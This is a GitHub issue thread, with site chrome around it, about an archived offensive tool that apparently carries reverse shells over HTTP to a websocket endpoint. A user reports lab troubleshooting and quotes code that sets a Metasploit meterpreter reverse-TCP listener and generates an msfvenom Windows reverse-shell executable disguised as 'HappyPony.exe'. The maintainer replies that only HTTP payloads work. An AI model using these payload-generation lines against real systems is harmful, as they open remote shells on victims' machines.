You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on Mar 11, 2023. It is now read-only.
Awesome repo. What other payloads can be used with this.
I tried it out in my lab, it works with the python payload however I tried changing the listener as well as the msvenom payload to a windows stageless payload and it doesn't seem to work.
Only payload that works is http, when i developed this tool i tried many payloads, but you need to remember that connection is made through this protocol to .ws so using a tcp payload or nc will not work
Sign up for freeto subscribe to this conversation on GitHub.
Already have an account?
Sign in.
Hi,
Awesome repo. What other payloads can be used with this.
I tried it out in my lab, it works with the python payload however I tried changing the listener as well as the msvenom payload to a windows stageless payload and it doesn't seem to work.
f.write("set PAYLOAD windows/meterpreter_reverse_tcp\n")
payload = "msfvenom -p windows/shell_reverse_tcp LHOST=" + lhost + " LPORT=80 -f exe > HappyPony.exe"
The text was updated successfully, but these errors were encountered: